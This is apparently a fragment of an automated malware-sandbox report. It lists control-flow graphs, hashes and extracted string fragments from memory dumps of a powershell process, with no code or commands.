                                                        • Instruction ID: b1f905ef7fbbfcd6c6a550228c00513e5b725cd9ef0f14bbf2092598982ff8f4
                                                        • Opcode Fuzzy Hash: 036d2abb79041d75042989a39521cd1f6cf0dec1287deb8d0182901898bc7a0e
                                                        • Instruction Fuzzy Hash: 5471F374E15218CFDB54CFA8D488BADBBF2BB4A302F1091A9D409A7740DB745D85CF48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                        • API String ID: 0-3222669578
                                                        • Opcode ID: aeef70281093618f3fc4012df4df8c1408a114fc85106ad6ef0d3483bd1ecc87
                                                        • Instruction ID: f6fa0cd1986cd4e3c496adf0f8d13db733e0129c5b04c6818e1fbbc124eb500b
                                                        • Opcode Fuzzy Hash: aeef70281093618f3fc4012df4df8c1408a114fc85106ad6ef0d3483bd1ecc87
                                                        • Instruction Fuzzy Hash: 9AB228F1B00206DFDB648F69C9446AABBF2FF85211F18C67AE8169B251DB31DC41C7A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                        • API String ID: 0-1790025989
                                                        • Opcode ID: 6c307f55a0af011e2ded28eb2e743b70370dc6b7bcdd716496bf521f4aaca895
                                                        • Instruction ID: ada7c00e5cba380f0c89cc77e945cc71b985ec7d9c41477d7936d9953690d66e
                                                        • Opcode Fuzzy Hash: 6c307f55a0af011e2ded28eb2e743b70370dc6b7bcdd716496bf521f4aaca895
                                                        • Instruction Fuzzy Hash: EFB2C4F0B102059FDB64DF69C944A6BBBF2EF85210F14C27AE8169B351DB31E842CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 922 704a6b8-704a6e3 923 704a975-704a9bd 922->923 924 704a6e9-704a6ee 922->924 936 704a9c3-704a9c8 923->936 937 704abcc-704abd8 923->937 925 704a706-704a70a 924->925 926 704a6f0-704a6f6 924->926 929 704a710-704a714 925->929 930 704a922-704a92c 925->930 927 704a6f8 926->927 928 704a6fa-704a704 926->928 927->925 928->925 934 704a716-704a725 929->934 935 704a727 929->935 932 704a92e-704a937 930->932 933 704a93a-704a940 930->933 940 704a946-704a952 933->940 941 704a942-704a944 933->941 942 704a729-704a72b 934->942 935->942 938 704a9e0-704a9ec 936->938 939 704a9ca-704a9d0 936->939 953 704abda 937->953 954 704abdb-704abff 937->954 956 704ab76-704ab80 938->956 957 704a9f2-704a9f5 938->957 944 704a9d4-704a9de 939->944 945 704a9d2 939->945 946 704a954-704a972 940->946 941->946 942->930 947 704a731-704a733 942->947 944->938 945->938 951 704a735-704a750 947->951 952 704a752 947->952 959 704a754-704a756 951->959 952->959 953->954 960 704ac75-704aca7 954->960 961 704ac01-704ac06 954->961 964 704ab82-704ab8b 956->964 965 704ab8e-704ab94 956->965 957->956 963 704a9fb-704aa02 957->963 959->930 962 704a75c-704a788 959->962 977 704ad1d-704ad30 960->977 978 704aca9-704acae 960->978 967 704ac1e-704ac2a 961->967 968 704ac08-704ac0e 961->968 962->930 1020 704a78e-704a79b 962->1020 963->937 971 704aa08-704aa0d 963->971 973 704ab96-704ab98 965->973 974 704ab9a-704aba6 965->974 967->960 970 704ac2c-704ac33 967->970 975 704ac10 968->975 976 704ac12-704ac1c 968->976 980 704ac35-704ac3b 970->980 981 704ac4b-704ac5c 970->981 982 704aa25-704aa29 971->982 983 704aa0f-704aa15 971->983 985 704aba8-704abc9 973->985 974->985 975->967 976->967 989 704acc6-704acd2 978->989 990 704acb0-704acb6 978->990 991 704ac3d 980->991 992 704ac3f-704ac49 980->992 999 704ac61-704ac74 981->999 982->956 988 704aa2f-704aa33 982->988 993 704aa17 983->993 994 704aa19-704aa23 983->994 995 704aa35-704aa44 988->995 996 704aa46 988->996 989->977 1003 704acd4-704acdb 989->1003 1000 704acb8 990->1000 1001 704acba-704acc4 990->1001 991->981 992->981 993->982 994->982 1004 704aa48-704aa4a 995->1004 996->1004 1000->989 1001->989 1006 704acf3-704ad1c 1003->1006 1007 704acdd-704ace3 1003->1007 1004->956 1009 704aa50-704aa52 1004->1009 1015 704ace5 1007->1015 1016 704ace7-704acf1 1007->1016 1018 704aa54-704aa60 1009->1018 1019 704aa62 1009->1019 1015->1006 1016->1006 1021 704aa64-704aa66 1018->1021 1019->1021 1022 704a834-704a873 1020->1022 1023 704a7a1-704a7a6 1020->1023 1021->956 1026 704aa6c-704aa74 1021->1026 1053 704a87a-704a87e 1022->1053 1027 704a7be-704a7d7 1023->1027 1028 704a7a8-704a7ae 1023->1028 1029 704aa76-704aa7c 1026->1029 1030 704aa92 1026->1030 1027->1022 1040 704a7d9-704a7fb 1027->1040 1032 704a7b0 1028->1032 1033 704a7b2-704a7bc 1028->1033 1035 704aa82-704aa8e 1029->1035 1036 704aa7e-704aa80 1029->1036 1034 704aa94-704aa9f 1030->1034 1032->1027 1033->1027 1034->956 1046 704aaa5-704aabf 1034->1046 1038 704aa90 1035->1038 1036->1038 1038->1034 1047 704a815-704a832 1040->1047 1048 704a7fd-704a803 1040->1048 1055 704aac1-704aaca 1046->1055 1056 704aae2 1046->1056 1047->1053 1050 704a805 1048->1050 1051 704a807-704a813 1048->1051 1050->1047 1051->1047 1060 704a880-704a889 1053->1060 1061 704a8a1 1053->1061 1058 704aad1-704aade 1055->1058 1059 704aacc-704aacf 1055->1059 1062 704aae5-704ab04 1056->1062 1064 704aae0 1058->1064 1059->1064 1066 704a890-704a89d 1060->1066 1067 704a88b-704a88e 1060->1067 1065 704a8a4-704a8b0 1061->1065 1080 704ab06-704ab0c 1062->1080 1081 704ab1c-704ab73 1062->1081 1064->1062 1074 704a8b2-704a8b8 1065->1074 1075 704a8c8-704a91f 1065->1075 1070 704a89f 1066->1070 1067->1070 1070->1065 1076 704a8bc-704a8be 1074->1076 1077 704a8ba 1074->1077 1076->1075 1077->1075 1082 704ab10-704ab12 1080->1082 1083 704ab0e 1080->1083 1082->1081 1083->1081
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                        • API String ID: 0-21239266
                                                        • Opcode ID: 535869e7d94198a808c257816d21873b924ac46488194bb65db2d91ff2a06192
                                                        • Instruction ID: 8ea2ccb658fce06acb600ce9d58f1ef9855859a3bcd347c8991084c90d05f105
                                                        • Opcode Fuzzy Hash: 535869e7d94198a808c257816d21873b924ac46488194bb65db2d91ff2a06192
                                                        • Instruction Fuzzy Hash: 2802F6F1B402069FDB649B69C95076AB7F2EF85210F18C1BAE4568F351CB31DC42CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (oq$(oq$4'q$4'q$4'q$4'q$tPq$tPq
                                                        • API String ID: 0-4014748467
                                                        • Opcode ID: 5d5d4a38aa1fd3c60a1da06af9ba92679d72c9c223d19ff747b8497f4a739c83
                                                        • Instruction ID: ee6e48c50a57d2019ef128bd1a3fde7e56e3e8f3952f04efad32c83647acbe05
                                                        • Opcode Fuzzy Hash: 5d5d4a38aa1fd3c60a1da06af9ba92679d72c9c223d19ff747b8497f4a739c83
                                                        • Instruction Fuzzy Hash: 4AA2F7B1F043049FDB649F69C9447AAB7E2EF88610F1CC4AAE906DB251EB31DD41CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q$tPq$tPq
                                                        • API String ID: 0-3271992745
                                                        • Opcode ID: 07c835658cc8e4f93c961c84426f02f18f56da37891e70f4cb2b5bbf810e8f63
                                                        • Instruction ID: 9599addd20e003647ecc506bb98a4eb02d3e20a666c3b2871ad3dec42ca89d1a
                                                        • Opcode Fuzzy Hash: 07c835658cc8e4f93c961c84426f02f18f56da37891e70f4cb2b5bbf810e8f63
                                                        • Instruction Fuzzy Hash: C2826075F043148FEB64DF58C950BAEB7B2EB85310F1484AAD909AB351DB31ED82CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1759 7048798-70487ba 1760 70487c0-70487c5 1759->1760 1761 70489c9-70489e4 1759->1761 1762 70487c7-70487cd 1760->1762 1763 70487dd-70487e1 1760->1763 1769 70489e6-7048a04 1761->1769 1770 7048a07-7048a13 1761->1770 1764 70487d1-70487db 1762->1764 1765 70487cf 1762->1765 1767 70487e7-70487eb 1763->1767 1768 704896e-7048978 1763->1768 1764->1763 1765->1763 1771 70487ed-70487fe 1767->1771 1772 704882b 1767->1772 1773 7048986-704898c 1768->1773 1774 704897a-7048983 1768->1774 1769->1770 1776 7048b2e-7048b60 1770->1776 1777 7048a19-7048a1e 1770->1777 1771->1761 1792 7048804-7048809 1771->1792 1775 704882d-704882f 1772->1775 1778 7048992-704899e 1773->1778 1779 704898e-7048990 1773->1779 1775->1768 1781 7048835-7048839 1775->1781 1798 7048b70 1776->1798 1799 7048b62-7048b6e 1776->1799 1782 7048a36-7048a3a 1777->1782 1783 7048a20-7048a26 1777->1783 1785 70489a0-70489c6 1778->1785 1779->1785 1781->1768 1788 704883f-7048843 1781->1788 1786 7048a40-7048a42 1782->1786 1787 7048ade-7048ae8 1782->1787 1790 7048a28 1783->1790 1791 7048a2a-7048a34 1783->1791 1794 7048a44-7048a5f 1786->1794 1795 7048a61 1786->1795 1800 7048af6-7048afc 1787->1800 1801 7048aea-7048af3 1787->1801 1788->1768 1797 7048849-704886f 1788->1797 1790->1782 1791->1782 1802 7048821-7048829 1792->1802 1803 704880b-7048811 1792->1803 1805 7048a63-7048a65 1794->1805 1795->1805 1797->1768 1831 7048875-7048879 1797->1831 1804 7048b72-7048b74 1798->1804 1799->1804 1806 7048b02-7048b0e 1800->1806 1807 7048afe-7048b00 1800->1807 1802->1775 1808 7048815-704881f 1803->1808 1809 7048813 1803->1809 1814 7048b76-7048b78 1804->1814 1815 7048bee-7048bf8 1804->1815 1805->1787 1816 7048a67 1805->1816 1817 7048b10-7048b2b 1806->1817 1807->1817 1808->1802 1809->1802 1821 7048b88 1814->1821 1822 7048b7a-7048b86 1814->1822 1819 7048c03-7048c09 1815->1819 1820 7048bfa-7048c00 1815->1820 1829 7048a71-7048a75 1816->1829 1826 7048c0f-7048c1b 1819->1826 1827 7048c0b-7048c0d 1819->1827 1828 7048b8a-7048b8c 1821->1828 1822->1828 1832 7048c1d-7048c36 1826->1832 1827->1832 1828->1815 1833 7048b8e-7048b94 1828->1833 1834 7048a77-7048a7d 1829->1834 1835 7048a8f-7048adb 1829->1835 1836 704888c 1831->1836 1837 704887b-704888a 1831->1837 1839 7048b96-7048b98 1833->1839 1840 7048ba2-7048bab 1833->1840 1841 7048a81-7048a8d 1834->1841 1842 7048a7f 1834->1842 1845 704888e-7048890 1836->1845 1837->1845 1839->1840 1846 7048bad-7048baf 1840->1846 1847 7048bb9-7048bd6 1840->1847 1841->1835 1842->1835 1845->1768 1850 7048896-70488a0 1845->1850 1846->1847 1856 7048bd8-7048be8 1847->1856 1857 7048c39-7048c3e 1847->1857 1854 70488a2-70488ab 1850->1854 1855 70488c3 1850->1855 1859 70488b2-70488bf 1854->1859 1860 70488ad-70488b0 1854->1860 1858 70488c6-70488d1 1855->1858 1856->1815 1857->1856 1858->1768 1865 70488d7-70488db 1858->1865 1861 70488c1 1859->1861 1860->1861 1861->1858 1866 70488dd-70488e6 1865->1866 1867 70488fe 1865->1867 1868 70488ed-70488fa 1866->1868 1869 70488e8-70488eb 1866->1869 1870 7048901-704896b 1867->1870 1871 70488fc 1868->1871 1869->1871 1871->1870
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (oq$(oq$$q$$q$$q
                                                        • API String ID: 0-2074718331
                                                        • Opcode ID: 758667f35c1c0be665be486a68c24a1cb2d64c383456a2d792ae176a5dd84dda
                                                        • Instruction ID: 0bb561fe8a8482045a8a53316880f5591014c304a91825acf1ea9f8c5c5e2f51
                                                        • Opcode Fuzzy Hash: 758667f35c1c0be665be486a68c24a1cb2d64c383456a2d792ae176a5dd84dda
                                                        • Instruction Fuzzy Hash: 00C116F1B003069FDB649E69D8047AABBE2FF85210F18C97AD9159B2C0DB31D851C7A1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1875 6baa716-6baa719 1876 6baa71b 1875->1876 1877 6baa71f-6baa78d 1875->1877 1876->1877 1878 6baa934-6baa97d 1876->1878 2091 6baa790 call 7048c60 1877->2091 2092 6baa790 call 7048c48 1877->2092 1890 6baaa1b-6baaa35 1878->1890 1885 6baa792-6baa7b6 1885->1890 1891 6baa7bc-6baa7d6 1885->1891 1892 6baaa37-6baaa5c 1890->1892 1893 6baaa64-6baaa99 1890->1893 1894 6baa7d8 1891->1894 1895 6baa7df-6baa803 1891->1895 1892->1893 1902 6baaa9f-6baaac3 1893->1902 1903 6bac0a4-6bac0ed 1893->1903 1894->1895 1898 6baa88a-6baa8ae 1894->1898 1899 6baa92f 1894->1899 1900 6baa832-6baa883 1895->1900 1901 6baa805-6baa82a 1895->1901 1904 6baab40-6baab64 1898->1904 1905 6baa8b4-6baa8e1 1898->1905 1899->1890 1900->1898 1901->1900 1902->1903 1915 6baaac9-6baab25 1902->1915 1929 6bac0f2-6bac1aa 1903->1929 1908 6baab93-6baaba0 1904->1908 1909 6baab66-6baab8b 1904->1909 1905->1904 1908->1903 1912 6baaba6-6baabf5 1908->1912 1909->1908 1928 6baabfb-6baabfd 1912->1928 1912->1929 1948 6baab3b 1915->1948 1949 6baab27-6baab36 1915->1949 1932 6baac03-6baac15 1928->1932 1935 6bac1d9-6bac20e 1929->1935 1936 6bac1ac-6bac1d1 1929->1936 1937 6baac1e-6baac42 1932->1937 1938 6baac17 1932->1938 1950 6bac2f9-6bac33d 1935->1950 1951 6bac214-6bac242 1935->1951 1936->1935 1940 6baac71-6baacd1 1937->1940 1941 6baac44-6baac69 1937->1941 1938->1937 1939 6baacd8-6baacfc 1938->1939 1944 6baad2b-6baad38 1939->1944 1945 6baacfe-6baad23 1939->1945 1940->1939 1941->1940 1953 6baad3e-6baad6c 1944->1953 1954 6bac054-6bac09d 1944->1954 1945->1944 1948->1904 1980 6bac342 1950->1980 1951->1950 1963 6bac248-6bac286 1951->1963 1953->1954 1962 6baad72-6baada0 1953->1962 1954->1932 1962->1954 1970 6baada6-6baadd4 1962->1970 1977 6bac28b-6bac2ba 1963->1977 1970->1954 1978 6baadda-6baaeb7 1970->1978 1985 6bac2e8-6bac2ee 1977->1985 1986 6bac2bc-6bac397 1977->1986 1997 6bab17d-6bab1a1 1978->1997 1998 6baaebd-6baaed7 1978->1998 1980->1980 1985->1950 1993 6bac3ff 1986->1993 1993->1993 1999 6bab1a3-6bab1c8 1997->1999 2000 6bab1d0-6bab2e6 1997->2000 2001 6baaed9-6baaefe 1998->2001 2002 6baaf06-6baaf13 1998->2002 1999->2000 2035 6bab549-6bab577 2000->2035 2036 6bab2ec-6bab306 2000->2036 2001->2002 2003 6baaf19-6baaf5d 2002->2003 2004 6bab134-6bab178 2002->2004 2003->2004 2013 6baaf63-6baaf83 2003->2013 2004->1997 2013->2004 2018 6baaf89-6baafbc 2013->2018 2018->2004 2025 6baafc2-6bab022 2018->2025 2025->2004 2032 6bab028-6bab0d6 2025->2032 2032->2004 2055 6bab0d8-6bab132 2032->2055 2051 6bab57c-6bab5cc 2035->2051 2040 6bab308-6bab314 2036->2040 2041 6bab330 2036->2041 2045 6bab31e-6bab324 2040->2045 2046 6bab316-6bab31c 2040->2046 2042 6bab336-6bab384 2041->2042 2042->2035 2058 6bab38a-6bab39f 2042->2058 2047 6bab32e 2045->2047 2046->2047 2047->2042 2051->1954 2055->1997 2063 6bab3b9-6bab3ee 2058->2063 2064 6bab3a1-6bab3a7 2058->2064 2063->2035 2073 6bab3f4-6bab414 2063->2073 2067 6bab3ab-6bab3b7 2064->2067 2068 6bab3a9 2064->2068 2067->2063 2068->2063 2073->2035 2075 6bab41a-6bab4fe 2073->2075 2075->2035 2086 6bab500-6bab547 2075->2086 2086->2051 2091->1885 2092->1885
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q
                                                        • API String ID: 0-4210068417
                                                        • Opcode ID: 1b71427e82a3c449889c480a180016445fbc7c48396b3a4adea56b211f3f05b3
                                                        • Instruction ID: 6002d6126f5afcddc0067c9668cffbed42fdd610b257195ce062b418a223437e
                                                        • Opcode Fuzzy Hash: 1b71427e82a3c449889c480a180016445fbc7c48396b3a4adea56b211f3f05b3
                                                        • Instruction Fuzzy Hash: 579262B4A403149FEB64DF14C954B9AB7B2EF85304F1081EAEA096B351CB71ED82CF95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2705 2bc950f-2bc952b 2723 2bc9531 call 2bcbdd8 2705->2723 2724 2bc9531 call 2bcbdc8 2705->2724 2707 2bc9537-2bc9556 2708 2bc955c-2bc9564 2707->2708 2709 2bc92b7-2bc92bd 2707->2709 2708->2709 2712 2bc9628-2bc9668 2708->2712 2710 2bc92bf 2709->2710 2711 2bc92c6-2bc92c7 2709->2711 2710->2712 2713 2bc92cc-2bc92d2 2710->2713 2714 2bc94a8-2bc94b5 2710->2714 2715 2bc93c7-2bc93d6 2710->2715 2711->2712 2711->2715 2712->2709 2722 2bc966e-2bc9676 2712->2722 2716 2bc92db-2bc92fa 2713->2716 2717 2bc92d4 2713->2717 2714->2709 2715->2709 2716->2709 2720 2bc92fc-2bc9304 2716->2720 2717->2716 2720->2709 2722->2709 2723->2707 2724->2707
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$F$Teq
                                                        • API String ID: 0-1661559856
                                                        • Opcode ID: 573b50e5f56ff8a235e4ced79e55800130023d95e05bddfa01d740cfdb168fe4
                                                        • Instruction ID: 328416fa17b5f5992d7186b4fa0eb7f0909c50f58457fadd71cbe62329da94b7
                                                        • Opcode Fuzzy Hash: 573b50e5f56ff8a235e4ced79e55800130023d95e05bddfa01d740cfdb168fe4
                                                        • Instruction Fuzzy Hash: CC21D3B0D01699CFEB50CF99D848BEDBBF5BB49304F609099D09AAB748DB745A85CF00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2725 6bab5cf-6bab5e2 2726 6bab5e8-6bab66c 2725->2726 2727 6bac054-6bac09d 2725->2727 2738 6bab69b-6bab718 2726->2738 2739 6bab66e-6bab693 2726->2739 2741 6baac1e-6baac42 2727->2741 2742 6baac17 2727->2742 2761 6bab71a-6bab73f 2738->2761 2762 6bab747-6bab754 2738->2762 2739->2738 2746 6baac71-6baacd1 2741->2746 2747 6baac44-6baac69 2741->2747 2742->2741 2745 6baacd8-6baacfc 2742->2745 2748 6baad2b-6baad38 2745->2748 2749 6baacfe-6baad23 2745->2749 2746->2745 2747->2746 2748->2727 2753 6baad3e-6baad6c 2748->2753 2749->2748 2753->2727 2758 6baad72-6baada0 2753->2758 2758->2727 2764 6baada6-6baadd4 2758->2764 2761->2762 2762->2727 2765 6bab75a-6bab7a8 2762->2765 2764->2727 2770 6baadda-6baaeb7 2764->2770 2765->2727 2775 6bab7ae-6bab7ca 2765->2775 2789 6bab17d-6bab1a1 2770->2789 2790 6baaebd-6baaed7 2770->2790 2775->2727 2778 6bab7d0-6bab80d 2775->2778 2778->2727 2784 6bab813-6bab851 2778->2784 2784->2727 2791 6bab857-6bab91e 2784->2791 2792 6bab1a3-6bab1c8 2789->2792 2793 6bab1d0-6bab2e6 2789->2793 2794 6baaed9-6baaefe 2790->2794 2795 6baaf06-6baaf13 2790->2795 2791->2727 2822 6bab924-6bab974 2791->2822 2792->2793 2841 6bab549-6bab577 2793->2841 2842 6bab2ec-6bab306 2793->2842 2794->2795 2797 6baaf19-6baaf5d 2795->2797 2798 6bab134-6bab178 2795->2798 2797->2798 2809 6baaf63-6baaf83 2797->2809 2798->2789 2809->2798 2816 6baaf89-6baafbc 2809->2816 2816->2798 2826 6baafc2-6bab022 2816->2826 2822->2727 2833 6bab97a-6baba22 2822->2833 2826->2798 2836 6bab028-6bab0d6 2826->2836 2860 6baba51-6baba86 2833->2860 2861 6baba24-6baba49 2833->2861 2836->2798 2867 6bab0d8-6bab132 2836->2867 2862 6bab57c-6bab5cc 2841->2862 2847 6bab308-6bab314 2842->2847 2848 6bab330 2842->2848 2853 6bab31e-6bab324 2847->2853 2854 6bab316-6bab31c 2847->2854 2849 6bab336-6bab384 2848->2849 2849->2841 2872 6bab38a-6bab39f 2849->2872 2855 6bab32e 2853->2855 2854->2855 2855->2849 2860->2727 2870 6baba8c-6babab0 2860->2870 2861->2860 2862->2727 2867->2789 2870->2727 2876 6babab6-6babb12 2870->2876 2879 6bab3b9-6bab3ee 2872->2879 2880 6bab3a1-6bab3a7 2872->2880 2897 6babb37-6babb3d 2876->2897 2898 6babb14-6babb29 2876->2898 2879->2841 2892 6bab3f4-6bab414 2879->2892 2884 6bab3ab-6bab3b7 2880->2884 2885 6bab3a9 2880->2885 2884->2879 2885->2879 2892->2841 2895 6bab41a-6bab4fe 2892->2895 2895->2841 2924 6bab500-6bab547 2895->2924 2900 6babb43-6babb8a 2897->2900 2898->2900 2905 6babbb9-6babbc6 2900->2905 2906 6babb8c-6babbb1 2900->2906 2905->2727 2907 6babbcc-6babbfa 2905->2907 2906->2905 2907->2727 2912 6babc00-6babc2e 2907->2912 2912->2727 2915 6babc34-6babc62 2912->2915 2915->2727 2918 6babc68-6babd45 2915->2918 2935 6babd4b-6babd65 2918->2935 2936 6bac0a2-6bac1aa 2918->2936 2924->2862 2937 6babd67-6babd8c 2935->2937 2938 6babd94-6babda1 2935->2938 2943 6bac1d9-6bac20e 2936->2943 2944 6bac1ac-6bac1d1 2936->2944 2937->2938 2941 6bac009-6bac052 2938->2941 2942 6babda7-6babdeb 2938->2942 2941->2727 2941->2936 2942->2941 2954 6babdf1-6babe11 2942->2954 2950 6bac2f9-6bac33d 2943->2950 2951 6bac214-6bac242 2943->2951 2944->2943 2972 6bac342 2950->2972 2951->2950 2959 6bac248-6bac286 2951->2959 2954->2941 2960 6babe17-6babe4a 2954->2960 2970 6bac28b-6bac2ba 2959->2970 2960->2941 2971 6babe50-6babeb0 2960->2971 2977 6bac2e8-6bac2ee 2970->2977 2978 6bac2bc-6bac397 2970->2978 2971->2941 2981 6babeb6-6babf16 2971->2981 2972->2972 2977->2950 2986 6bac3ff 2978->2986 2981->2941 2988 6babf1c-6babfa5 2981->2988 2986->2986 2988->2941 2993 6babfa7-6bac004 2988->2993 2993->2936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q
                                                        • API String ID: 0-1467158625
                                                        • Opcode ID: c291ec822f062bb206cf4cb3294a017afb96db61aedc216d83acbee3c5eb1ee7
                                                        • Instruction ID: 8ff2fc087bf7d75a53b44246e4fafcc386ac75af6b693637ce25a0c33e1f6763
                                                        • Opcode Fuzzy Hash: c291ec822f062bb206cf4cb3294a017afb96db61aedc216d83acbee3c5eb1ee7
                                                        • Instruction Fuzzy Hash: 65C230B4A402149FDB64CB14C950B99B7F2EB89304F14C1EAEA19AB351CB71ED82CF95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2998 7040488-70404ab 2999 7040650-70406a5 2998->2999 3000 70404b1-70404b6 2998->3000 3001 70404ce-70404d2 3000->3001 3002 70404b8-70404be 3000->3002 3006 70405fd-7040607 3001->3006 3007 70404d8-70404da 3001->3007 3004 70404c0 3002->3004 3005 70404c2-70404cc 3002->3005 3004->3001 3005->3001 3009 7040615-704061b 3006->3009 3010 7040609-7040612 3006->3010 3011 70404dc-70404e8 3007->3011 3012 70404ea 3007->3012 3014 7040621-704062d 3009->3014 3015 704061d-704061f 3009->3015 3016 70404ec-70404ee 3011->3016 3012->3016 3018 704062f-704064d 3014->3018 3015->3018 3016->3006 3019 70404f4-7040513 3016->3019 3026 7040515-7040530 3019->3026 3027 7040532 3019->3027 3028 7040534-7040536 3026->3028 3027->3028 3028->3006 3030 704053c-7040540 3028->3030 3030->3006 3031 7040546-7040565 3030->3031 3035 7040567-704056d 3031->3035 3036 704057d-7040582 3031->3036 3037 7040571-7040573 3035->3037 3038 704056f 3035->3038 3039 7040589-704058b 3036->3039 3037->3036 3038->3036 3040 70405a3-70405fa 3039->3040 3041 704058d-7040593 3039->3041 3042 7040595 3041->3042 3043 7040597-7040599 3041->3043 3042->3040 3043->3040
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q
                                                        • API String ID: 0-1467158625
                                                        • Opcode ID: 3451e1fd7925517a6c8d6018f29ba64143027b47579218854527f24b76ee8c47
                                                        • Instruction ID: f4720866f35889b321bb25a2e2e144160639b2cc5917c8f94d4866a6a6fed2d8
                                                        • Opcode Fuzzy Hash: 3451e1fd7925517a6c8d6018f29ba64143027b47579218854527f24b76ee8c47
                                                        • Instruction Fuzzy Hash: 0D5138F0B043069FDB615A7598107AF7BE2EBC6200F1481F7D646EB291DE35D982C7A2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3045 7046ae0-7046af2 3046 7046bb2-7046c2c 3045->3046 3047 7046af8-7046b09 3045->3047 3064 7046c2e-7046c3c 3046->3064 3065 7046c58-7046c5d 3046->3065 3051 7046b23-7046b40 3047->3051 3052 7046b0b-7046b11 3047->3052 3051->3046 3057 7046b42-7046b64 3051->3057 3053 7046b15-7046b21 3052->3053 3054 7046b13 3052->3054 3053->3051 3054->3051 3062 7046b66-7046b6c 3057->3062 3063 7046b7e-7046b96 3057->3063 3066 7046b70-7046b7c 3062->3066 3067 7046b6e 3062->3067 3072 7046ba4-7046baf 3063->3072 3073 7046b98-7046b9a 3063->3073 3074 7046c43-7046c52 3064->3074 3065->3064 3066->3063 3067->3063 3073->3072 3074->3065
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPq$tPq
                                                        • API String ID: 0-4270251778
                                                        • Opcode ID: 684ea744edcb217a2f8083cdeae4bd05a59ea40449e7b73d86c4a56906883e9d
                                                        • Instruction ID: 0299cb48576cbc2023a64636c9a8432a8c85c572dd18d17aaa29ef61855e5da3
                                                        • Opcode Fuzzy Hash: 684ea744edcb217a2f8083cdeae4bd05a59ea40449e7b73d86c4a56906883e9d
